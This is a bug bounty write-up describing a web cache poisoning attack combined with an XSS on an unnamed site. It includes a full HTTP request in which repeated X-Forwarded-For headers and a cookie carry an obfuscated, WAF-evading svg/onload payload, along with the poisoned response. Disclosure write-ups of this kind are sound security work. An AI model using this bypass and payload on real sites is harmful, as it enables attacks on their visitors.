Bounty: $2,000

While Google Dorking, i found a particular URL, but this time, was not being cached, but if i added an cacheable extension file (.js , .css) at the end of URL, it would cache the response.

Now, all i needed was to found a XSS. I found an injection point on a Cookie, but WAF would trigger when i added anything after %20

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP was also being reflected on that same script..

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried “X-Forwarded-For” Headers, this way i can close the <script> and avoid WAF, as it would trigger if it detected <[anything]>

This is why you will see 3 “X-Forwarded-For” Headers

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2 
Host: Redacted
X-Forwarded-For: xss 
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: > 
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After Poisoned an URL with an XSS, an attacker just needed to send it to the victim

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide XSS :D

This was my favorite Cache Poisoning, and it was found on a Public Program, hopefully we can disclose this in the near future :)